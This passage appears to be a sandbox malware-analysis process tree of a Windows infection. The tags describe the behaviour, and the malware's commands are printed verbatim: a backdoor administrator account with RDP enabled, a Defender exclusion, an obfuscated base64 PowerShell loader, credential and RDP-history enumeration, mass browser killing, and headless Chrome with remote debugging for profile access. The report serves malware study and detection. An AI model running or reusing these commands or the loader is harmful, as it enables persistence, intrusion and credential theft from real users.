- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:5376 -
C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exeC:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe6⤵
- Downloads MZ/PE file
- Checks computer location settings
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5184 -
C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe"C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3112 -
C:\Users\Admin\Abspawnhlp.exe"C:\Users\Admin\Abspawnhlp.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2624 -
C:\Users\Admin\Abspawnhlp.exeC:\Users\Admin\Abspawnhlp.exe9⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe9⤵
- System Location Discovery: System Language Discovery
PID:12144
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe"C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe"7⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4048
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000970271\NBFRPMVB.msi" /quiet7⤵
- System Location Discovery: System Language Discovery
PID:2004
-
-
C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe"C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5532
-
-
C:\Windows\SYSTEM32\net.exenet user "SystemUsersAdm" "1234567X!" /add /y7⤵PID:12972
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user "SystemUsersAdm" "1234567X!" /add /y8⤵PID:13044
-
-
-
C:\Windows\SYSTEM32\net.exenet localgroup "Administrators" "SystemUsersAdm" /add7⤵PID:13112
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administrators" "SystemUsersAdm" /add8⤵PID:13208
-
-
-
C:\Windows\System32\Wbem\WMIC.exeWMIC USERACCOUNT WHERE "Name = 'SystemUsersAdm'" SET PasswordExpires=FALSE7⤵PID:13228
-
-
C:\Windows\System32\Wbem\WMIC.exeWMIC USERACCOUNT WHERE "Name = 'SystemUsersAdm'" SET Passwordchangeable=FALSE7⤵PID:6580
-
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes7⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6796
-
-
C:\Windows\SYSTEM32\sc.exesc config termservice start= auto7⤵
- Launches sc.exe
PID:2120
-
-
C:\Windows\SYSTEM32\net.exenet start termservice7⤵PID:5884
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start termservice8⤵PID:7264
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe6⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3216
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5988 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:3836
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3228
-
-
-
C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:532
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6120
-
-
-
C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe"C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2432
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe"C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6096 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3680
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"3⤵
- System Location Discovery: System Language Discovery
PID:1512 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"4⤵
- System Location Discovery: System Language Discovery
PID:3968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2080 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4300
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe"C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe"3⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
PID:2568 -
C:\Windows\system32\cmd.exe"cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_3361556648.txt\""4⤵
- NTFS ADS
PID:1548
-
-
C:\Windows\system32\net.exe"net" statistics workstation4⤵PID:3312
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 statistics workstation5⤵PID:2812
-
-
-
C:\Windows\system32\vaultcmd.exe"vaultcmd" /list4⤵PID:392
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5904
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FO CSV /NH4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4716
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list4⤵PID:6128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:976 -
C:\Windows\system32\cmdkey.exe"C:\Windows\system32\cmdkey.exe" /list5⤵PID:5260
-
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1948
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5112
-
-
C:\Windows\system32\certutil.exe"certutil" -store My4⤵PID:5328
-
-
C:\Windows\system32\certutil.exe"certutil" -store -user My4⤵PID:2208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-VpnConnection | ConvertTo-Json"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "4⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4376
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5136
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list4⤵PID:4000
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5860
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list:TERMSRV/69.48.201.744⤵PID:4820
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1408
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1892
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM chrome.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2060
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM msedge.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3724
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM brave.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4296
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM opera.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:736
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM vivaldi.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4236
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM firefox.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2884
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM dragon.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:396
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM maxthon.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5628
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM uc_browser.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4000
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4008
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM slimjet.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5312
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1320
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM cent_browser.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:696
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM epic.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1408
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM Discord.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM torch.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1060
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordCanary.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM whale.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3200
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordPTB.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM 360browser.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1312
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM qqbrowser.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordDevelopment.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3804
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM browser.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4636
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe4⤵
- Kills process with taskkill
PID:3668
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM msedge.exe4⤵
- Kills process with taskkill
PID:5296
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM brave.exe4⤵
- Kills process with taskkill
PID:3508
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM opera.exe4⤵PID:1460
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM vivaldi.exe4⤵
- Kills process with taskkill
PID:5348
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM firefox.exe4⤵
- Kills process with taskkill
PID:3084
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM dragon.exe4⤵
- Kills process with taskkill
PID:5740
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM maxthon.exe4⤵
- Kills process with taskkill
PID:4772
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM uc_browser.exe4⤵
- Kills process with taskkill
PID:4136
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM slimjet.exe4⤵
- Kills process with taskkill
PID:5072
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM cent_browser.exe4⤵
- Kills process with taskkill
PID:3224
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM epic.exe4⤵
- Kills process with taskkill
PID:5656
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM torch.exe4⤵
- Kills process with taskkill
PID:1248
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM whale.exe4⤵
- Kills process with taskkill
PID:3440
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM 360browser.exe4⤵
- Kills process with taskkill
PID:4460
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM qqbrowser.exe4⤵
- Kills process with taskkill
PID:6124
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM browser.exe4⤵
- Kills process with taskkill
PID:4296
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq chrome.exe"4⤵
- Enumerates processes with tasklist
PID:5732
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=43895 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default4⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of FindShellTrayWindow
PID:2340 -
